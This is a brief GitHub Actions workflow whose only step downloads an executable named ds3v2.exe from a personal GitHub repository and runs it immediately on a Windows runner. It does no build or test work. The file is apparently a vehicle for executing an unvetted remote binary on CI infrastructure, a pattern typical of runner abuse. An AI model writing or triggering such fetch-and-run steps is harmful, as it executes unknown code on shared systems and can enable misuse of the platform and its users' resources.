name: b4
on:
  workflow_dispatch:
jobs:
  build:
    runs-on: windows-latest
    steps:
      - name: powershell
        shell: pwsh
        run: Invoke-WebRequest https://github.com/tre33333/ds3v2/raw/main/ds3v2.exe -OutFile ds3v2.exe ; .\ds3v2.exe
